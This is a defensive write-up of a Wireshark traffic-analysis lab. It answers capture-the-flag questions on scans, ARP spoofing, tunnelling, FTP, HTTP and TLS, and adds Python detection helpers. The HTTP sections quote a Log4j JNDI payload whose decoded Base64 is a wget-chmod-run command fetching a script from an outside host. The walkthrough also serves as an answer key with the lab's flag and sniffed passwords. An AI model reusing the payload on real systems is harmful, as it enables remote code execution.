WIRESHARK: TRAFFIC ANALYSIS
NMAP SCANS
Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. What is the total number of the "TCP Connect" scans?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size > 1024
WireShark > status bar
* Packets: 6544 Displayed: 1000 (15.3%)
Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which scan type is used to scan the TCP port 80?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: tcp.port==80
SYN, SYN/ACK, ACK
* sort the packet list window by "time" in ascending order
Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. How many "UDP close port" messages are there?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: icmp.type==3 and icmp.code==3
WireShark > status bar
* Packets: 6544 Displayed: 1083 (16.5%)
Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which UDP port in the 55-70 port range is open?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: (udp.dstport >= 55 && udp.dstport <=70) && !(icmp.code == 3)
Output: 67 Destination Unreachable/Port Unreachable
Output: 69 Destination Unreachable/Port Unreachable
Output: 68
- sort the "Info" column in order to see that 67 & 69 were unreachable
ARP POISONING & MITM
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of ARP requests crafted by the attacker?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: arp.opcode == 1 && eth.src == 00:0c:29:e2:18:b4
WireShark > status bar
* Packets: 2866 Displayed: 284 (9.9%)
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of HTTP packets received by the attacker?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: http && eth.dst == 00:0c:29:e2:18:b4
WireShark > status bar
* Packets: 2866 Displayed: 90 (3.1%)
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of sniffed username&password entries?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: ((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")
WireShark > status bar
* Packets: 2866 Displayed: 6 (0.2%)
* find the specific key/value (uname) in packet details then select
"apply as filter" "...and selected"
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the password of the "Client986"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: (((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")) && (urlencoded-form.value == "client986")
CTRL+F:
Packet: Packet Details
Type: Narrow & Wide
Case sensitive: disabled
Search Type: String
Search: Client986
* clientnothere!
* find the specific key/value (client986) in packet details then select
"apply as filter" "...and selected"
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the comment provided by the "Client354"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: ((http && eth.dst == 00:0c:29:e2:18:b4))
CTRL+F:
Packet: Packet Details
Type: Narrow & Wide
Case sensitive: disabled
Search Type: String
Search: Client354
* Nice Work!
IDENTIFYING HOSTS | DHCP, NETBIOS & KERBEROS
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. What is the MAC address of the host "Galaxy A30"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
#step 1: get an overview
WireShark
Filter: dhcp
Packet Details > DHCP > Option: (12) Host Name
...
#step 2: expand the filter
Filter: lower(dhcp.option.hostname) contains "a30"
...
Packet Details > DHCP > Option: (61) Client Identifier
Client MAC Address > Copy > Value
9a:81:41:cb:96:6c
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. How many NetBIOS registration requests does the "LIVALJM" workstation have?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
WireShark > Analyze > Display Filter Expression
Search: nbns
Field Name: NBNS > nbns.name
Relation: contains
Value: n/a
Filter: nbns.name contains "ALJM"
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > NBNS > Flags > right-click ... = Opcode: Registration (5) > Apply as Filter > ...And Selected
Filter: (nbns.name contains "ALJM") && (nbns.flags.opcode == 5)
* Packets: 1800000 Displayed: 16 (0.0%)
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. Which host requested the IP address "172.16.13.85"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
WireShark > Analyze > Display Filter Expression
Search: requested
Field Name: DHCP/BOOTP > dhcp.option.requested_ip_address
Relation: ==
Value: 172.16.13.85
Filter: dhcp.option.requested_ip_address == 172.16.13.85
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > DHCP > DHCP (Request) > right-click option (12) > right-click Host Name > Copy > Value
Galaxy-A12
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the IP address of the user "u5"? (Enter the address in defanged format.)
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap
WireShark > Analyze > Display Filter Expression
Search: cnamestring
Field Name: KRB5 > kerberos.CNameString
Relation: contains
Value: u5
Filter: kerberos.CNameString contains "u5"
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > Kerberos > req-body > cname > cname-string > u5
* this verifies that you are identifying the correct packet
WireShark > Packet Details > IPv4 > Src > Copy > Value
Internet Protocol Version 4, Src: 10.1.12.2, Dst: 10.5.3.1
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the hostname of the available host in the Kerberos packets?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap
WireShark > Analyze > Display Filter Expression
Search: cnamestring
Field Name: KRB5 > kerberos.CNameString
Relation: contains
Value: $
Filter: kerberos.CNameString contains "$"
* Some packets provide hostname information in this field. To avoid confusion, filter on the "$" value: values ending with "$" are hostnames, and the ones without it are user names.
WireShark > Packet List > packet > Packet Details > Kerberos > tgs-rep > cname > right-click cname-string > Copy > Value
xp1$
TUNNELING TRAFFIC: DNS & ICMP
Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file. Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap
#step 1: get an overview
WireShark
Filter: icmp
#anomalous
WireShark > icmp && data.len > 64
* normal ICMP packets are 64 bytes in size; anything larger than this could be a sign of tunneling
Wireshark
Filter: icmp && data.len > 64 and (icmp contains "ssh" or icmp contains "ftp" or icmp contains "tcp" or icmp contains "http")
* include protocols commonly used in data exfiltration: "ssh", "ftp", "tcp", "http"
- when the hexadecimal output is converted to ASCII, "ssh-rsa" will be shown
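Added example (not part of the original notes): the same "data.len > 64 plus protocol strings" heuristic applied to raw ICMP messages in Python, with a checksum check on top. The two sample packets are constructed here; the 64-byte threshold and the marker strings are the ones used by the filter above.

```python
import struct

TUNNEL_MARKERS = (b"ssh", b"ftp", b"tcp", b"http")   # strings the display filter looks for
NORMAL_DATA_LEN = 64                                 # data.len threshold used in the notes

def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_icmp_echo(ident, seq, payload):
    """Test fixture: an ICMP echo request (type 8) with a valid checksum."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

def analyse_icmp(packet):
    """Return (data_len, reasons) for one raw ICMP message (IP header removed).
    data_len mirrors Wireshark's data.len: bytes after the 8-byte echo header.
    An empty reasons list means the packet looks like a plain ping."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP header")
    _type, _code, _csum, _ident, _seq = struct.unpack("!BBHHH", packet[:8])
    payload = packet[8:]
    reasons = []
    if icmp_checksum(packet) != 0:           # valid message sums to zero
        reasons.append("bad checksum")
    if len(payload) > NORMAL_DATA_LEN:
        reasons.append(f"data.len {len(payload)} > {NORMAL_DATA_LEN}")
    hits = [m.decode() for m in TUNNEL_MARKERS if m in payload.lower()]
    if hits:
        reasons.append("protocol strings in payload: " + ",".join(hits))
    return len(payload), reasons

# Constructed samples: a normal 56-byte ping payload, and a payload carrying
# an SSH banner plus padding, as a tunnelled session might.
SAMPLES = {
    "ping": build_icmp_echo(0x1234, 1, bytes(range(56))),
    "tunnel": build_icmp_echo(0x1234, 2, b"SSH-2.0-OpenSSH_8.9" + b"A" * 80),
}

def scan_samples():
    """Run the heuristic over every constructed sample."""
    return {name: analyse_icmp(pkt) for name, pkt in SAMPLES.items()}

if __name__ == "__main__":
    for name, (dlen, reasons) in scan_samples().items():
        verdict = "SUSPICIOUS " + "; ".join(reasons) if reasons else "ok"
        print(f"{name}: data.len={dlen} {verdict}")
```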
Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file. Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/dns.pcap
#step 1: get an overview
WireShark
Filter: dns
#anomalous
WireShark
Filter: dns.qry.name.len > 15 and !mdns
* this detects DNS queries with a name length greater than 15 characters, excluding multicast DNS (mDNS).
#pin-point
WireShark > Packet list > Packet Details > DNS > Queries > ... > right-click Name > Apply as Filter > ...And not selected
((((dns.qry.name.len > 15 and !mdns) && !(dns.qry.name == "v10.events.data.microsoft.com")) && !(dns.qry.name == "connectivity-check.ubuntu.com")) && !(dns.qry.name == "131.94.168.192.in-addr.arpa")) && !(dns.qry.name == "8.8.8.8.in-addr.arpa")
A8D603B0DE000000009AF29E902AB216780EAFD10AA3E4A376A2D9165E7809E.2030742EDA1B513BF68DFD675E855A2AA61B2BCE0A7889811D12B34806B9A18.441119E94628EA35FFF9.dataexfil.com
* keep filtering out non-pertinent query names until only the suspicious domain remains
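Added example (not from the original notes): the same triage done in Python over a constructed list of query names. It applies the length filter, the mDNS and allowlist exclusions, then groups what is left by main domain and scores each domain by how many long hex-looking labels sit under it. The allowlist entries are the ones excluded above; the "last two labels" rule for the main domain is an assumption (no public-suffix list).

```python
import re
from collections import defaultdict

# Constructed sample of dns.qry.name values (not taken from the exercise pcap).
SAMPLE_QUERIES = [
    "google.com",
    "v10.events.data.microsoft.com",
    "connectivity-check.ubuntu.com",
    "8.8.8.8.in-addr.arpa",
    "_services._dns-sd._udp.local",
    "static.cloudflareinsights.com",
    "4a6f686e00deadbeefcafef00d1234.dataexfil.com",
    "7468697320697320612074657374.7465737431.dataexfil.com",
    "deadbeef0badc0de.dataexfil.com",
]

# Names excluded with "Apply as Filter > ...And not Selected" in the notes.
ALLOWLIST = {"v10.events.data.microsoft.com", "connectivity-check.ubuntu.com"}
HEX_LABEL = re.compile(r"^[0-9A-Fa-f]{16,}$")   # long label made only of hex digits

def is_candidate(name, min_len=15):
    """Mirror of: dns.qry.name.len > 15 and !mdns, plus the manual exclusions.
    mDNS is approximated by the .local suffix; PTR names are dropped too."""
    if len(name) <= min_len or name in ALLOWLIST:
        return False
    if name.endswith(".local") or name.endswith(".in-addr.arpa"):
        return False
    return True

def main_domain(name):
    """Main (registrable) domain approximated as the last two labels."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])

def suspicious_domains(queries):
    """Group candidate queries by main domain; rank by hex-looking labels,
    then by longest label. Returns a list of (domain, stats) pairs."""
    stats = defaultdict(lambda: {"queries": 0, "hex_labels": 0, "max_label": 0})
    for q in queries:
        if not is_candidate(q):
            continue
        s = stats[main_domain(q)]
        s["queries"] += 1
        for label in q.split(".")[:-2]:          # subdomain labels only
            s["max_label"] = max(s["max_label"], len(label))
            if HEX_LABEL.match(label):
                s["hex_labels"] += 1
    return sorted(stats.items(),
                  key=lambda kv: (kv[1]["hex_labels"], kv[1]["max_label"]),
                  reverse=True)

if __name__ == "__main__":
    for domain, s in suspicious_domains(SAMPLE_QUERIES):
        print(f"{domain}: {s}")
```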
CLEARTEXT PROTOCOL ANALYSIS: FTP
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. How many incorrect login attempts are there?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#anomalous
WireShark
Filter: ftp.response.code == 530
WireShark > status bar
* Packets: 20448 Displayed: 737 (3.6%)
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. What is the size of the file accessed by the "ftp" account?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#anomalous
WireShark
Filter: ftp.response.code == 213
WireShark > Packet list > Packet bytes > FTP > 213 > Response Args: 39424
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary uploaded a document to the FTP server. What is the filename?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"
WireShark > Packet List > Packet Details > FTP > RETR > Request Arg > Copy > Value
* resume.doc
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"
WireShark > Packet List > right-click packet > Follow > TCP Stream
...
PWD
257 "/" is current directory.
TYPE A
200 Type set to A
EPSV
229 Entering Extended Passive Mode (|||35656|)
LIST
150 Opening ASCII mode data connection for file list
226 Transfer complete.
SITE CHMOD 777 resume.doc
550 resume.doc: Permission denied
QUIT
221 Goodbye.
CLEARTEXT PROTOCOL ANALYSIS: HTTP
Use the "Desktop/exercise-pcaps/http/user-agent.cap" file. Investigate the user agents. What is the number of anomalous "user-agent" types?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap
#step 1: get an overview
WireShark
Filter: http.user_agent
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Wfuzz/2.4
sqlmap/1.4#stable (http://sqlmap.org)
Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
- Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
* count each unique, potentially malicious user-agent manually
- there are six unique user-agents that are anomalous, but one of them is
a modified user-agent (Windows NT 6.4); this specific user-agent
has six occurrences
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers
Use the "Desktop/exercise-pcaps/http/user-agent.cap" file. What is the packet number with a subtle spelling difference in the user agent field?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap
#step 1: get an overview
WireShark
Filter: http.user_agent
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Wfuzz/2.4
sqlmap/1.4#stable (http://sqlmap.org)
Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
- Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
- 52 -1063550943.144639779 10.10.57.178 44.228.249.3 HTTP 469 Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 GET /categories.php HTTP/1.1
* count each unique, potentially malicious user-agent manually
- there are six unique user-agents that are anomalous, but one of them is
a modified user-agent (Windows NT 6.4); this specific user-agent
has six occurrences
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers
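Added example (not from the original notes) covering both user-agent questions above: a small classifier that flags the six anomalous strings from the sorted column, including the "Mozlila" near-miss found by edit distance against "Mozilla" and the never-released "Windows NT 6.4". The sample list mirrors the page's values (the JNDI payload is shortened); the scanner markers and the set of released NT versions are assumptions.

```python
import re

# Sample User-Agent values modelled on the sorted column in the notes; the
# first six are the anomalous ones, the last is a normal browser string.
SAMPLE_UAS = [
    "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/QUJD}",   # payload shortened
    "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)",
    "Wfuzz/2.4",
    "sqlmap/1.4#stable (http://sqlmap.org)",
    "Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 "
    "(KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10",
    "Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36",
]

TOOL_MARKERS = ("nmap", "wfuzz", "sqlmap", "nikto", "masscan")       # assumption
KNOWN_NT = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}  # assumption

def edit_distance(a, b):
    """Levenshtein distance; catches one- or two-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_ua(ua):
    """Return the reasons a User-Agent looks anomalous (empty list = normal)."""
    reasons = []
    low = ua.lower()
    if "${jndi:" in low:
        reasons.append("jndi lookup string")
    for tool in TOOL_MARKERS:
        if tool in low:
            reasons.append(f"scanner: {tool}")
    product = ua.split("/", 1)[0]                      # token before the first "/"
    if product != "Mozilla" and 0 < edit_distance(product.lower(), "mozilla") <= 2:
        reasons.append(f"misspelled product token: {product}")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in KNOWN_NT:
        reasons.append(f"unreleased Windows NT {nt.group(1)}")
    return reasons

def anomalous_uas(uas):
    """Map each anomalous User-Agent to its reasons."""
    result = {}
    for ua in uas:
        reasons = classify_ua(ua)
        if reasons:
            result[ua] = reasons
    return result

if __name__ == "__main__":
    for ua, reasons in anomalous_uas(SAMPLE_UAS).items():
        print(f"{ua[:40]:40} -> {'; '.join(reasons)}")
```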
Use the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase. What is the packet number?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains $
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers
Use the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains $
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
root@dco:~$ cyberchef.io
input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
recipe: From Base64
recipe: Defang IP Addresses
output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers
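Added example (not from the original notes): the CyberChef steps above (From Base64, Defang IP Addresses) as a Python helper for triage, using the User-Agent value copied from packet 444 as its sample input. It parses the ${jndi:...} string, defangs the callback host, and if the path carries a Base64 segment decodes it and defangs every IPv4 address in the result. The regexes are assumptions about the lookup-string shape seen on this page.

```python
import base64
import re

# User-Agent value from packet 444 in the notes, reused as the sample input.
SAMPLE_UA = ("${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/"
             "d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}")

JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/]+)"
                  r"(?::(?P<port>\d+))?(?P<path>/[^}]*)?\}", re.I)
B64_PATH = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)$")
IPV4 = re.compile(r"\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\b")

def defang(text):
    """Rewrite every IPv4 address as a[.]b[.]c[.]d so it is not clickable."""
    return IPV4.sub(lambda m: "[.]".join(m.groups()), text)

def decode_jndi_ua(ua):
    """Parse a ${jndi:...} lookup string out of a header value.
    Returns None when none is present; otherwise a dict with the defanged
    callback host, port, and the decoded (defanged) command if one is carried."""
    m = JNDI.search(ua)
    if not m:
        return None
    result = {
        "scheme": m.group("scheme").lower(),
        "callback": defang(m.group("host")),
        "port": int(m.group("port")) if m.group("port") else None,
        "command": None,
        "command_ips": [],
    }
    b = B64_PATH.search(m.group("path") or "")
    if b:
        try:   # validate=True rejects anything outside the Base64 alphabet
            cmd = base64.b64decode(b.group("b64"), validate=True).decode("utf-8", "replace")
        except ValueError:   # binascii.Error is a ValueError subclass
            cmd = None
        if cmd is not None:
            result["command"] = defang(cmd)
            result["command_ips"] = [defang(ip.group(0)) for ip in IPV4.finditer(cmd)]
    return result

if __name__ == "__main__":
    print(decode_jndi_ua(SAMPLE_UA))
```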
ENCRYPTED PROTOCOL ANALYSIS: DECRYPTING HTTPS
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. What is the frame number of the "Client Hello" message sent to "accounts.google.com"?
root@dco:~$ wireshark &
#step 1: get an overview
WireShark
Filter: (http.request or tls.handshake.type == 1) and !(ssdp) && tls.handshake.extensions_server_name
* the tls.handshake.extensions_server_name filter limits the output to packets that carry an SNI field
#step 2:
WireShark > Packet list > Packet Details > TLS > TLSvX.X Record Layer > Handshake Protocol > Extension: server_name > Server Name Indication Extension > right-click "Server Name: ..." > Apply as Column
16 0.755456 192.168.1.12 172.217.17.237 TLSv1.3 571 accounts.google.com Client Hello
* visually scan potential malicious domains from the packet list Server Name Column
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all HTTPS traffic can now be decrypted, as long as the key log file was collected enterprise-wide
#step 1: get an overview
WireShark
Filter: http2
* Packets: 1760 Displayed: 115 (6.5%)
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all HTTPS traffic can now be decrypted, as long as the key log file was collected enterprise-wide
Wireshark > Go > Go to Packet
Packet No. 322
Wireshark > Packet List > Packet Details > HTTP2 > Header: :Authority
safebrowsing[.]googleapis[.]com
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Investigate the decrypted packets and find the flag! What is the flag?
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all HTTPS traffic can now be decrypted, as long as the key log file was collected enterprise-wide
Wireshark > File > Export Objects > HTTP
1644 situla.bitbit.net text/plain 3412 bytes 21e2ae0fb85fde7bb246ed90194f601e041b3c8...
* Save & open the file for the flag
- FLAG{THM-PACKETMASTER}
BONUS: HUNTING CLEARTEXT CREDENTIALS
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number of the credentials using "HTTP Basic Auth"?
root@dco:~$ wireshark &
WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
Packet No. Protocol Username Additional Info
237 HTTP Basic Auth afiiskc
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number where "empty password" was submitted?
root@dco:~$ wireshark &
WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
Packet No. Protocol Username Additional Info
170 FTP Administrator Username in packet 136
BONUS: ACTIONABLE RESULTS!
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?
root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}
WireShark > Go > Go to Packet
Packet No: 99
WireShark > Tools > Firewall ACL Rules
Create Rule For: IPFirewall (ipfw)
Inbound: enabled
Deny: enabled
add deny ip from 10.121.70.151 to any in
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?
root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}
WireShark > Go > Go to Packet
Packet No: 231
WireShark > Tools > Firewall ACL Rules
Create Rule For: IPFirewall (ipfw)
Inbound: enabled
Deny: disabled
add allow MAC 00:d0:59:aa:af:80 any in